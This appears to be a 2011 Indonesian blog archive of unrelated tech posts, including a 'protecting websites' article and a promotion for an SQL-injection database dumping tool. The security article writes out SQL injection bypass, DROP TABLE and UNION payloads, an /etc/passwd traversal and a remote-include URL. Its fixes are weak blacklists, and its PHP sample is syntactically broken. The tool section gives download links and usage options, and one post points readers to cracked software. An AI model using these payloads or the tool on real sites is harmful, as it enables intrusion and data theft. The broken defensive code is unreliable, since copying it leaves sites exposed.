Dengan melakukan pemasaran atau promosi melalui internet, produk kita bisa dilihat oleh puluhan ribu bahkan ratusan ribu orang setiap bulannya yang berasal dari berbagai kota dan negara berbeda.

Hacker VS Cracker ??
Mungkin anda sudah sering mendengar istilah Hacker & Cracker. Namun, apa yang dimaksud Hacker & Cracker ? Lalu apa perbedaannya ?

Perkembangan teknologi yang semakin pesat semakin meningkatnya tingkat kriminalitas yang dilakukan oleh penjahat lewat internet. Seorang penjahat internet tidak tanggung-tanggung menguras habis uang suatu perusahaan hanya dalam hitungan menit melalui internet.

Lalu, Siapa Penjahat Internet Tersebut ?
Penjahat tersebut disebut dengan istilah “Cracker”. Cracker adalah musuh besar bagi Hacker karena mereka memiliki tujuan yang berkebalikan. Cracker memiliki tujuan untuk merusak komputer korban melalui internet sedangkan hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama saja dengan cracker padahal keduanya sangatlah berbeda, hanya mereka sama-sama seorang programmer yang mana bisa menyusup sistem keamanan komputer.

Sudah banyak perusahaan-perusahaan besar yang telah meminta bantuan para hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya.
 

Cara Kerja Jaringan Tanpa Kabel

Jaringan wireless: jaringan yang mengkoneksikan dua komputer atau lebih menggunakan sinyal radio, cocok untuk berbagi-pakai file, printer, atau akses Internet.

· Berbagi sumber file dan memindah-mindahkannya tanpa menggunakan kabel.
· Mudah untuk di-setup dan handal sehingga cocok untuk pemakaian di kantor atau di rumah.
· Produk dari produsen yang berbeda kadang-kadang tidak kompatibel.
· Harganya lebih mahal dibanding menggunakan teknologi ethernet kabel biasa.

Bila Anda ingin mengkoneksikan dua komputer atau lebih di lokasi yang sukar atau tidak mungkin untuk memasang kabel jaringan, sebuah jaringan wireless (tanpa kabel) mungkin cocok untuk diterapkan. Setiap PC pada jaringan wireless dilengkapi dengan sebuah radio tranceiver, atau biasanya disebut adapter atau kartu wireless LAN, yang akan mengirim dan menerima sinyal radio dari dan ke PC lain dalam jaringan. Anda akan mendapatkan banyak adapter dengan konfigurasi internal dan eksternal, baik untuk PC desktop maupun notebook.

Mirip dengan jaringan Ethernet kabel, sebuah wireless LAN mengirim data dalam bentuk paket. Setiap adapter memiliki nomor ID yang permanen dan unik yang berfungsi sebagai sebuah alamat, dan tiap paket selain berisi data juga menyertakan alamat penerima dan pengirim paket tersebut. Sama dengan sebuah adapter Ethernet, sebuah kartu wireless LAN akan memeriksa kondisi jaringan sebelum mengirim paket ke dalamnya. Bila jaringan dalam keadaan kosong, maka paket langsung dikirimkan. Bila kartu mendeteksi adanya data lain yang sedang menggunakan frekuensi radio, maka ia akan menunggu sesaat kemudian memeriksanya kembali.

Wireless LAN biasanya menggunakan salah satu dari dua topologi--cara untuk mengatur sebuah jaringan. Pada topologi ad-hoc--biasa dikenal sebagai jaringan peer-to-peer--setiap PC dilengkapi dengan sebuah adapter wireless LAN yang mengirim dan menerima data ke dan dari PC lain yang dilengkapi dengan adapter yang sama, dalam radius 300 kaki (±100 meter). Untuk topologi infrastruktur, tiap PC mengirim dan menerima data dari sebuah titik akses, yang dipasang di dinding atau langit-langit berupa sebuah kotak kecil berantena. Saat titik akses menerima data, ia akan mengirimkan kembali sinyal radio tersebut (dengan jangkauan yang lebih jauh) ke PC yang berada di area cakupannya, atau dapat mentransfer data melalui jaringan Ethernet kabel. Titik akses pada sebuah jaringan infrastruktur memiliki area cakupan yang lebih besar, tetapi membutuhkan alat dengan harga yang lebih mahal.

Walau menggunakan prinsip kerja yang sama, kecepatan mengirim data dan frekuensi yang digunakan oleh wireless LAN berbeda berdasarkan jenis atau produk yang dibuat, tergantung pada standar yang mereka gunakan. Vendor-vendor wireless LAN biasanya menggunakan beberapa standar, termasuk IEEE 802.11, IEEE 802.11b, OpenAir, dan HomeRF. Sayangnya, standar-standar tersebut tidak saling kompatibel satu sama lain, dan Anda harus menggunakan jenis/produk yang sama untuk dapat membangun sebuah jaringan.

Semua standar tersebut menggunakan adapter menggunakan segmen kecil pada frekuensi radio 2,4-GHz, sehingga bandwith radio untuk mengirim data menjadi kecil. Tetapi adapter tersebut menggunakan dua protokol untuk meningkatkan efisiensi dan keamanan dalam pengiriman sinyal:
· Frequency hopping spread spectrum, dimana paket data dipecah dan dikirimkan menggunakan frekuensi yang berbeda-beda, satu pecahan bersisian dengan lainnya, sehingga seluruh data dikirim dan diterima oleh PC yang dituju. Kecepatan sinyal frekuensi ini sangat tinggi, serta dengan pemecahan paket data maka sistem ini memberikan keamanan yang dibutuhkan dalam satu jaringan, karena kebanyakan radio tranceiver biasa tidak dapat mengikutinya.
· Direct sequence spread spectrum, sebuah metode dimana sebuah frekuensi radio dibagi menjadi tiga bagian yang sama, dan menyebarkan seluruh paket melalui salah satu bagian frekuensi ini. Adapter direct sequence akan mengenkripsi dan mendekripsi data yang keluar-masuk, sehingga orang yang tidak memiliki otoritas hanya akan mendengar suara desisan saja bila mereka menangkap sinyal radio tersebut.

Vendor wireless LAN biasanya menyebutkan transfer rate maksimum pada adapter buatan mereka. Model yang menggunakan standar 802.11 dapat mentransfer data hingga 2 megabit per detik, baik dengan metode frequency hopping atau direct sequence. Adapter yang menggunakan standar OpenAir dapat mentransfer data hingga 1,6-mbps menggunakan frequency hopping. Dan standar terbaru, HomeRF dapat mengirim dan menerima data dengan kecepatan 1,6-mbps (dengan menggunakan metoda frekuensi hopping). Wireless LAN kecepatan tinggi menggunakan standar 802.11b--yang dikenal sebagai WiFi--mampu mengirim data hingga 11-mbps dengan protokol direct sequence.

Tanpa Kabel: Jaringan Di Masa Depan?

Wireless LAN mungkin tampaknya sangat layak untuk diterapkan dimana saja dan kapan saja. Tetapi harganya masih mahal, dan kinerjanya masih belum dapat diandalkan. Pada kebanyakan kantor, jaringannya menggunakan Ethernet kabel, karena sudah lama terpasang, dan harganya sangat murah. Untuk di rumah, orang dapat menggunakan jaringan kabel telepon untuk menyambungkan banyak PC dan dapat dipakai untuk berbagi-pakai akses Internet.

Wireless LAN harganya masih mahal. Pada tahun 1999, sebuah adapter harganya sekitar US$500, bandingkan dengan harga sebuah kartu Ethernet yang cuma US$20 atau kartu jaringan telepon seharga US$100. Perubahan mungkin akan tampak, saat Apple memperkenalkan sistem jaringan wireless AirPort untuk Macintosh, yang mampu memberikan troughput hingga 11-mbps dengan harga US$99 per node. Sejak itu, vendor lainnya berlomba-lomba menyediakan produk berharga murah tetapi berkinerja tinggi. Sebuah firma riset pasar Yankee Group memperkirakan bahwa wireless LAN akan mampu menembus pasar jaringan rumah pada tahun 2003.

Untuk saat ini, Anda dapat membeli adapter wireless LAN internal (kartu PCI atau ISA), model eksternal USB, dan PC Card atau kartu CardBus untuk notebook. Versi SOHO (small office-home office) dari Proxim (www.proxim.com) dan WebGear (www.webgear.com) harganya US$70 sampai US$130 per adapter. Harga ini bergantung dari jenis standar teknologi yang digunakan pada adapter. Untuk kalangan industri, adapternya berharga US$500 hingga US$700 dengan tambahan kemampuan seperti roaming (kemampuan untuk menggunakan titik akses manapun pada jaringan).

Pemakai dapat menambah titik akses untuk memperluas jangkauan jaringan mereka atau membantu mengatur lalu lintas data yang lewat. Adapter untuk titik akses tersebut tersedia dari Apple (untuk komputer Macintosh), Lucent (www.lucent.com/pss/prodover/) dan Proxim, dengan harga US$300 hingga US$700. Sebuah titik akses dapat berfungsi sebagai sebuah bridge ke jaringan kabel yang ada.

Di antara standar yang ada, para analis menjagokan IEEE 802.11b. Dengan kecepatan transfer hingga 11-mbps, 802.11b dapat menyalurkan data empat kali lebih cepat dibanding yang lain, tetapi harganya tidak jauh berbeda. Sementara itu, baru-baru ini, HomeRF yang dibeking oleh perusahaan besar seperti Intel, Compaq, dan Motorola, mendapat pengakuan dari FCC (Federal Communication Commission) sebagai standar wireless LAN resmi di Amerika Serikat. Walau begitu beberapa analis meragukan HomeRF dapat menjadi standar yang diakui di seluruh dunia, karena 802.11b terlanjur telah diadopsi oleh banyak vendor untuk produk wireless LAN berkecepatan tinggi.

Sabtu, 19 Maret 2011

Cara Membuat atau Membakar Bootable CD

Terkadang kita sering dibikin pusing  untuk membackup data pc / komputer kita, hasilnya jika suatu saat OS komputer kita error kita kebingungan bahkan harus ke tempat servis komputer dan menghabiskan tidak sedikit biaya hanya untuk instalasi ulang OS. Instalasi OS (Operating System) sebenarnya sangat sederhana dan mudah dimengerti asal kita mengetahui dasar-dasar komputer. Setting komputer agar “Boot from CD” bisa dilakukan di BIOS, kemudian masukkan CD Installer dan jalankan sesuai petunjuk.
Bagaimana cara mengkopi bootable cd ke komputer agar bisa bootable? Setiap CD Installer OS selalu bootable agar bisa di-boot from CD pada BIOS. Jika kita sembarang kopi ke Hard Disk (HDD) dan burn CD maka hasilnya CD tidak bootable artinya CD tersebut tidak bisa di-boot from BIOS karena terdeteksi sebagai media data CD. Cara yang BENAR untuk kopi CD Bootable ke dalam HDD adalah dengan menyimpannya kedalam format ISO baru kemudian dari file ISO ini dibakar ke CD menggunakan Nero atau software pembakar CD lainnya.
CD Bootable memiliki Image yang bisa dibaca oleh BIOS. Jadi intinya file ISO merupakan copy image CD tersebut. Bagaimana membuat file ISO? Ada beberapa software yang bisa kita gunakan untuk membuat file ISO dari CD antara lain Nero, ImgDISC, UltraISO, Alcohol 120%, dan sebagainya. Beberapa software tersebut memang tidak diberikan gratis, tapi banyak blogger yang rela membagikan program pembuat ISO secara gratis cari saja di Google. Biasanya file tersebut dihost di 4shared.com dan biasanya juga sudah ada Serial Number maupun Cracknya.
Yang sekarang saya gunakan adalah UltraISO Premium. Untuk membuat file ISO dengan UltraISO cukup mudah, tinggal klik Tools – Make CD/DVD Image tentunya dengan memasukkan CD Boot tersebut terlebih dahulu ke dalam CD/DVD ROOM kemudian tentukan tempat direktori penyimpanan file ISO tersebut dan Klik Make. Jika menggunakan Nero gunakan fasilitas Copy Boot CD terus target imagenya diubah (jangan CD/DVD RW tetapi direktori). Jika Anda menggunakan Nero file outputnya adalah .nrg
Jika Anda tidak punya CD Boot, tetapi punya file instalasi XP (misal) yang Anda copy ke HDD jangan khawatir kita bisa membuatnya menjadi Bootable CD kok. Caranya gunakan software nLite yang bisa didownload di www.nliteos.com. Untuk menggunakan software ini kita wajib menginstal Microsoft NET FrameWork karena nLite bekerja menggunakan FrameWork. Untuk download Microsoft NET Frame Work.

3 Cara Membuat Blog Dikenal Google Dan Teman-Temannya

Untuk bisa menghasilkan traffik pengunjung dari menuju blog kita dari search engine, langkah pertama yang harus dilakukan adalah membuat blog kita terindeks oleh search engine. Atau dalam bahasa orang umum, membuat blog kita “dikenal” oleh search engine seperti google, yahoo dan sebagainya.
Kenapa harus terindeks / dikenal search engine? Sebab dengan dikenalnya blog kita oleh search engine, maka itu membuat search engine bisa mereferensikan blog kita saat ada orang yang mencari keyword tertentu. Jika tidak dikenal, maka kita tidak akan pernah direferensikan oleh search engine. Dan akibatnya, jarang ada pengunjung datan ke blog kita.
Kalau dalam dunia nyata, logikanya jika tidak dikenal maka tidak akan ada orang yang mereferensikan kita. Walaupun katakanlah kita jago sekali dalam urusan servis komputer, tapi kalau kita tidak dikenal orang, maka orang tidak akan menyebut nama kita sebagai jago servis komputer saat ada yang sedang butuh. Logis kan?
Lalu, bagaimana cara mengecek apakah blog kita sudah ter-indeks oleh search engine atau belum? Jawabannya, silakan cek di search engine yang inginkan, lalu ketikkan alamat blog Anda di sana.
Misalnya untuk mengecek apakah blog saya sudah terindeks di google,
  • pergilah ke google.com
  • ketik site:haryoonline.com
  • jika ada halaman dari haryoonline.com muncul di hasil pencarian, maka berarti blog tersebut sudah diindeks google. Jika tidak, maka sebaliknya.
Nah, yang jadi masalah, kadang ada pertanyaan masuk ke email saya, tentang bagaimana caranya supaya situs atau blog yang dimiliki seseorang bisa terindeks search engine? Apakah Anda memiliki pertanyaan yang sama?
Tanggapan saya: caranya mudah sekali :)
Ada beberapa cara yang bisa Anda lakukan. Tergantung dari di mana Anda membuat blog Anda.

Cara pertama: membiarkan terindeks sendiri.
Cara ini adalah cara paling mudah. Dan berlaku jika blog Anda memiliki alamat di blogspot.com atau di wordpress.com.
Dengan cara ini Anda hanya perlu menunggu supaya google / yahoo / lainnya datang sendiri ke blog Anda. Tidak perlu mengenalkan blog Anda ke search engine – search engine tersebut. Kenapa? Karena secara default, blog yang didaftarkan di blogspot.com dan wordpress.com akan didaftarkan secara otomatis.

Cara kedua: mendaftarkan manual ke search engine
Cara ini adalah cara yang kedua. Silakan daftarkan langsung blog Anda di halaman pendaftaran URL dari search engine. Cara ini memastikan bahwa blog Anda pasti terindeks oleh search engine.
Untuk mendaftar, silakan daftarkan blog Anda ke :
masukkan URL (alamat) dari blog Anda di sana, isi formulir yang diberikan di sana.

Cara ketiga: meminta link dari blog lain
Cara terakhir, cobalah untuk mendapat link dari situs / blog lain yang sudah ter-indeks oleh search engine seperti google. Misalnya, coba minta teman Anda untuk memberi sebuah link menuju blog Anda.
Nanti search engine akan secara otomatis mengikuti link yang diberikan oleh teman Anda (atau situs lainnya) untuk kemudian meng-indeks blog Anda, seperti search engine mengindeks web yang memberi Anda link tersebut.
Sudah, selesai. Hanya 3 (tiga) cara itu saja. Tidak susah kan?
Jadi, sekarang coba lakukan salah satu atau ketiga cara tersebut sekaligus. Saya yakin, jika Anda melakukannya maka blog Anda akan ter-indeks oleh google dalam waktu beberapa hari saja. Dijamin.

 Selamat mencoba! :)

10 Cara Menambah Pengunjung Blog Anda

Dear rekan-rekan pebisnis online….
Kalau Anda ingin sukses berbisnis di internet, salah satu syaratnya adalah memiliki sebuah situs atau blog yang memiliki banyak pengunjung (high traffic). Dengan banyaknya traffik pengunjung, kemungkinan Anda untuk sukses semakin besar.
Dengan memiliki pengunjung yang melimpah, Anda bisa mendapatkan penjualan yang lebih banyak. Dengan memiliki pengunjung yang berlimpah, Anda bisa menawarkan spot iklan yang lebih mahal dibanding situs atau blog yang ber-traffik rendah.
Nah kalau begitu pertanyaannya adalah :
Bagaimana cara meningkatkan traffik situs atau blog Anda?
Jawaban dari saya :
Ada banyak sekali, saya sendiri menerapkan belasan cara untuk meningkatkan traffik menuju situs-situs dan blog-blog saya.
Dan berita baiknya… saya akan membagikan sebagian caranya kepada Anda :)
OK, kalau gitu kita mulai tips-tipsnya (saya fokuskan untuk blog).

[1] Pergunakan nama domain yang mudah diingat
Jika Anda ingin meningkatkan traffik, usahakan untuk memiliki nama domain sendiri.
Jika Anda ingin situs atau blog Anda sukses dengan besar, maka yang pertama kali harus Anda perhatikan adalah nama Anda. Sama dengan kalau Anda ingin menjadi selebritis, nama Anda harus mudah diingat orang.
Mana yang lebih mudah diingat oleh Anda:
  • namaAnda.com atau namaAnda.wordpress.com atau namaAnda.blogspot.com atau namaAnda.domainTertentu.com?
Saya rasa semua menjawab namaAnda.com.
Nah sekarang pertanyaannya mana yang lebih mudah diingat oleh pengunjung situs Anda? Dan mana yang akan lebih mereka sukai untuk dikunjungi? [yang pada akhirnya akan membuat traffik lebih tinggi]
Saya rasa jawabannya akan tetap sama, namaAnda.com.
Karenanya, usahakan untuk memiliki sebuah domain sendiri. Para pengunjung akan cenderung lebih mengingat nama yang pendek dan mereka akan lebih suka berkunjung ke situs yang memiliki nama yang pendek.
Jangan biarkan mereka lari hanya karena nama situs/blog yang terlalu panjang.

[2] Tulis artikel-artikel pillar
Yang dimaksud artikel-artikel pillar adalah artikel-artikel yang berfungsi sebagai sebuah “pillar/penyangga” traffik situs Anda.
Artikel-artikel ini biasanya sebuah artikel yang bertipe “list”, seperti 10 Tips Meningkatkan traffik, 5 Blog Teknologi Terbaik, Definisi Internet Marketing, dan sejenisnya.
Tipe-tipe artikel pillar seperti akan menarik traffik bagai magnet menarik besi, karena orang-orang akan selalu mencari artikel-artikel seperti ini. Orang-orang selalu butuh informasi tentang definisi dari suatu hal, atau 10 daftar terbaik untuk xxxxxxx atau sejenisnya.
Beda dengan artikel yang bercerita tentang pengalaman pribadi, orang-orang tidak terlalu tertarik dengan artikel-artikel seperti itu. Mungkin tertarik, tapi akan dilupakan — dan akhirnya tidak dikunjungi lagi, dan tidak direferensikan kepada orang lain.
Intinya : artikel-artikel yang selalu dicari-cari orang dan membuat orang lain ingin mengunjunginya berkali-kali PLUS menyebarkannya kepada orang lain.

[3] Rajinlah mengupdate postingan
Salah satu tips terpenting untuk meningkatkan jumlah kunjungan ke blog Anda adalah dengan sering-sering menulis.
Orang akan senang berkunjung ke blog Anda jika mereka selalu mendapatkan sebuah artikel yang baru, yang fresh, yang segar. Mereka tidak akan suka, bahkan kecewa, jika datang ke blog Anda dan hanya disuguhi artikel-artikel yang lama.
Rasanya mungkin seperti disuguhi ikan basi.
Jadi jika Anda ingin situs Anda memiliki pembaca yang loyal, yang rutin berkunjung, sering-seringlah mengupdate blog Anda. Saran saya, 2-3 hari sekali minimal harus ada sebuah artikel baru. Atau, kalau bisa setiap hari bahkan lebih bagus.
 
[4] Seringlah berkomentar
Untuk mendapatkan traffik ke blog Anda, salah satu cara lainnya yang bisa dipergunakan adalah dengan sering-sering berkomentar di blog orang lain.
Pada saat Anda menuliskan komentar di blog orang lain, tentu Anda akan dimintai URL (alamat) dari situs/blog Anda, bukan? Nah, dari sanalah traffik akan datang.
Pastikan Anda memasukkan URL blog Anda dengan benar, atau URL posting blog yang ingin Anda promosikan dengan benar.
Menurut saya pribadi, yang ini efeknya kecil, tapi patut dicoba.

[5] Gunakan FEEDBURNER
Untuk meningkatkan traffik ke blog Anda, salah satu tips lainnya yang bisa Anda lakukan adalah dengan memanfaatkan jasa dari feedburner.com.
Manfaatkan jasa gratis dari feedburner.com untuk meningkatkan jumlah pembaca RSS dari blog Anda, atau bahkan untuk memfasilitasi para pembaca yang ingin menikmati blog Anda via email.
Saya sendiri menggunakan FEEDBURNER untuk haryoonline.com, dan hasilnya untuk setiap postingan saya bisa mendapat puluhan bahkan ratusan pembaca secara instant (dan gratis).

[6] Submit artikel Anda ke Social Bookmark
Jangan remehkan the power of viral marketing!
Submit artikel Anda ke berbagai layanan social bookmarking seperti del.icio.us, atau digg.com atau technorati.com untuk meningkatkan traffik Anda.
Setiap kali ada orang melakukan searching sebuah topik yang sesuai dengan artikel yang Anda submit ke situs-situs tersebut, Anda berkesempatan untuk mendapatkan tambahan traffik pengunjung secara free.

[7] Optimasi SEO
Dapatkan banyak traffik gratis lainnya dari SEO!
Pelajari SEO (tidak dijelaskan di artikel ini) dan aplikasikan untuk blog/situs Anda, dan bahkan untuk halaman-halaman di situs/blog Anda. Traffik dari SEO ini sangat berkualitas dan targetted, serta 100% free.
Pengalaman saya pribadi, untuk beberapa domain yang saya miliki, saya dapat menghasilkan sekitar 300-400 pengunjung per hari secara gratis hanya dengan mengandalkan SEO semata. Free traffik, free money.
Jadi, jangan Anda sia-siakan.

[8] Buat artikel yang sedang “in” (populer)
Sebuah trik sederhana yang bisa membuat blog Anda mendapat kunjungan berlimpah adalah dengan membuat posting dengan judul (dan isi) yang bersangkutan dengan sebuah hal yang sedang menjadi “trend” di masyarakat.
Misalkan di masyarakat sedang ada kasus “Banjir di Jakarta” atau “Gunung Merapi meletus”, maka Anda bisa mencoba membuat sebuah artikel yang berkaitan dengan hal tersebut.
Dengan menulis artikel yang terkait dengan sebuah event yang sedang populer, Anda bisa jadi menarik banyak link dari blog lain atau bahkan menempati posisi yang tinggi di search engine (mis: google) untuk keyword terkait artikel berita tersebut ( karena belum ada blog lain yang membahas).
Ujung-ujungnya, traffik Anda bisa meningkat drastis.

[9] Bertukar link
Cara kuno? Eits, jangan diremehkan. Bertukar link walau terlihat kuno, tetapi saya buktikan sendiri bahwa hal ini sangat efektif.
Blog-blog saya bisa mendapat beberapa puluh (belum ratusan) pengunjung baru dalam sehari hanya dari hasil bertukar link dengan banyak blog lainnya.
Jika Anda betul-betul serius berbisnis, jangan sia-siakan satu pengunjung pun. Sebab siapa tahu satu pengunjung yang Anda anggap “remeh” (tidak terlalu signifikan) tersebut justru pengunjung yang “membawa uang” untuk Anda.
Jangan pernah meremehkan hal-hal kecil.

[10] Memasang iklan
Sebagai cara terakhir, jika memang Anda tidak berbakat dalam melakukan berbagai promosi yang gratis, atau Anda butuh hasil instant yang biasanya tidak bisa dicapai melalui traffik yang gratis, saran saya adalah : memasang iklan.
Anda bisa menggunakan berbagai sarana iklan, mulai dari PPC TExt, hingga banner-banner. Mulai dari jaringan yang khusus menangani iklan (seperti Google Adwords, KumpulBlogger) atau iklan di blog-blog pribadi orang lain.
Cara yang terakhir ini jujur saja agak mahal, tapi kalau Anda bisa memanfaatkannya dengan baik (memutar traffiknya mennjadi uang), tidak jadi masalah. Tidak ada ruginya beriklan beberapa ribu jika mendapat hasil beberapa juta.


Bukan begitu?
Semoga bermanfaat, :)

Sabtu, 12 Maret 2011

Protecting Website From Common Attacks

[1] Pendahuluan
Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan
di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.
[2] Cross Site Scripting
Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.

Example:
http://www.situs.net/find.php?all=”>

*Solusi (javascript) :
function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
return strTemp;
}

[3] SQL Injection
*\_ Login Form Bypassing
Berikut adalah contoh kode yang dapat kita bisa bypass:
index.html file:


Password:
login.php file:
Kita dapat bypass dengan menggunakan ‘ or ’1=1′, dan menjalankan “password = ”or ’1=1”;”.
Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.

*Solusi :
Menggunakan mysql_real_escape_string
Contoh:

*\_ Union SQL Injection
Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.

Contoh :
http://www.situs.net/index.php?id=1′
salah satu contoh pesan error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..

Setelah muncul pesan error,maka attacker melanjutkan aksinya ;) )
http://www.situs.net/index.php?id=1 ORDER BY 1– <– No error.
http://www.situs.net/index.php?id=1 ORDER BY 2– <– Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– <– Memilih semua kolom dan menjalankan
perintah version().

*Solusi :
Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:
$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($bug, "", $patch);

[4] File Inclusion
\_ Remote File Inclusion dan Local File Inclusion
Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.

Contoh kode yang vulnerable :
Beberapa contoh serangan :
http://www.situs.net/page.php?page=../../../../../ etc/passwd < contoh LFI
http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? < contoh RFI

*Solusi :

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}

[5] Special Thanks
[-] Allah SWT, Muhammad SAW
[-] The big Family of :
[-] M0slem Hax0r – Echo – Indonesian Coder – Jasakom – Indonesian Hackers – Malang Cyber Crew
[-] ManadoCoding – Devilzc0de – Yogyacarderlink – Xcode – Hacker Newbie
[-] Klix ITN Malang – Kolam (Komunitas Linux Arek Malang)


mirror :
http://www.exploit-db.com/papers/14577/
http://packetstormsecurity.org/papers/general/protecting-websites.txt

Tracking Email Dengan Mozilla ThunderBird

Berikut ini adalah contoh pelacakan atas pengirim email yang dikirimkan dari Account email @GMAIL ke email @YAHOO.CO.ID dengan mengunakan email Client Mozilla ThunderBird. Jika mengunakan email Client yang lain ( Outlook, Evolution, TheBat, dll ), silahkan di Explore sendiri karena tidak terlalu jauh berbeda. Tahapan yang kita lakukan untuk melihat ASAL SEBUAH KIRIMAN EMAIL adalah dengan memanfaatkan fitur MESSAGE SOURCE.

Pertama yang harus kita lakukan adalah melakukan setting email Client seperti biasanya hingga SENT dan RECEIVE email berfungsi dengan NORMAL.

Kedua : Buka atau klik email yang akan di analisa lalu klik menu VIEW terus pilih Message Source, seperti gambar dibawah ini.

Ketiga : Selanjutnya akan muncul tampilan gambar dibawah ini dan pelototi dengan teliti tulisan / teks yang ada disitu. Lalu….

Keempat : Perhatikan pada gambar diatas ini, tulisan dalam kotak biru tersebut. 192.168.88.240 adalah IP Address LOCAL dari PC yang saya gunakan untuk mengirim email GMAIL dan IP Address : 110.232.68.81 adalah IP Public yang menjadi Gateway akses internet PC saya tersebut.

Kelima : Kita uji lagi / analisa lagi pengiriman email yang kedua dengan mengunakan PC yang berbeda. Perhatikan gambar dibawah ini.

Keenam : Perhatikan tulisan dalam kotak biru gambar diatas. 192.168.88.100 adalah IP Address LOCAL dari PC yang saya gunakan untuk mengirim email GMAIL dan IP Address : 125.164.75.150 adalah IP Public yang menjadi Gateway akses internet PC saya tersebut.

Oke lah kalo begitu, silahkan dicoba sendiri trik ini. Sangat mudah koq, walaupun realitanya banyak orang yang bisa mengirim email dengan berbagai teknik untuk menyamarkan dirinya. Namun, setidaknya kita bisa memahami TRACING EMAIL SENDER ini dan tidak jarang orang yang suka mengunakan email untuk SPAMMING ataupun untuk men-TERROR orang lain kebanyakan mereka sembrono alias gegabah sehingga IP Address tukang terror tersebut dapat di lacak dengan mudah. So… himbauan saya… gunakanlah email ataupun internet untuk sesuatu hal yang lebih bermanfaat alias gunakan secara PROPORSIONAL

Cara Download Dari Google Book

Google Book Search adalah fasilitas yang disediakan google untuk pencarian buku-buku elektronik (ebook) yang dapat di download secara gratis, tapi tidak semua ebook dapat ditampilkan secara full priview, semua tergantung izin dari penerbitnya. proyek perpustakaan digital yang mulai di kembangkan gooole sejak tahun 2007 ini telah bekerjasama dengan sejumlah perpustakaan dan penerbit buku diseluruh dunia sehingga tentunya buku -buku tersebut juga tersedia dalam bermacam bahasa dunia.
Banyak buku buku populer yang tersedia di Google Books anda cukup memasukkan judul buku yang dicari dan google akan menampilkan semua buku yang berhubungan dengan judul tersebut. buku tersebut dapat dibaca secara online namun untuk mendownload buku tersebut google tidak menyediakan alatnya di halaman Google Book Search. untuk bisa mendownload dan membacanya secara offline dibutuhkan trik baik memanfaatkan aplikasi pihak ketiga ataupun secara manual di windows agar anda dapat menyimpannya dalam folder di komputer dalam format pdf.
Berikut ini adalah bebarapa tirk untuk mendownload buku Google dan simpan sebagai file PDF atau mencetaknya.
Dengan Bantuan Software
Google Book Downloader
Aplikasi yang dirancang untuk suatu utilitas kecil yang memungkinkan Anda untuk menyimpan buku, PDF dari Google kedalam file lokal komputer anda. Persyaratan : sebelum menggunakan tools ini pastikan komputer anda sudah terinstal Microsoft. Framework 3.5 SP1.
Cara menggunakan Google Book Downloader ?
  1. Download Google Books Downloader dan Extract filenya. Double click mdgb.exe untuk menjalankan aplikasi.
  2. Paste URL dari buku yang ingin anda download.
  3. Klik tombol “Check” , untuk mengambil semua halaman buku yang tersedia.
  4. Klik tombol “Download entire book” untuk men-download semua halaman.
  5. klik tombol “Save entire book as…” dan Semua halaman download akan disimpan dalam format PDF

Simple SQL Dumper V.5.1

[o] attention
USE THIS TOOL FOR EDUCATION PURPOSE ONLY.
WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!
[o] what is SSDp?
SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.
[o] download SSDp v5.1
http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz
[o] function
- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column
[o] command and option
[root@evilc0de noge]# perl ssdp.pl -h
|—————————————————————————–|
| Usage: perl ssdp.pl [options] |
| |
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: “–”) |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: “+”) |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
| |
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
| |
| -log [file name] file name to save ssdp data (default: ssdp.log) |
